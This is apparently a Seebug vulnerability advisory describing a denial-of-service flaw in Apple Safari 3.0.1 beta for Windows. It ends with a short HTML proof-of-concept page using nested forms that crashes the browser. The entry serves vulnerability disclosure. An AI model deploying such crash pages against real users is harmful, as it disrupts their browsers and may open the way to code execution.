Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability

ID SSV:83636
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


Apple Safari for Windows is prone to a denial-of-service vulnerability because it fails to properly handle user-supplied input.

An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.

Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Attackers may also be able to execute arbitrary code, but Symantec had not confirmed this.

Safari 3.0.1 public beta for Windows is reported vulnerable.

<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title> <body> <p>Safari 3.0.1 beta for windows Crash Poc By Lostmon ( )</p> <p> Put some number in the second form for crash Safari</p> <form id="historyForm1" method="GET" action="#"> <input type="text" id="currentIndex1" name="currentIndex" value="sss"> <textarea id="historyLocation1" name="historyLocation"></textarea> <form id="historyForm2" method="GET" action="#"> <input type="text" id="currentIndex2" name="currentIndex"> <textarea id="historyLocation2" name="historyLocation"></textarea> </form></form></body></html>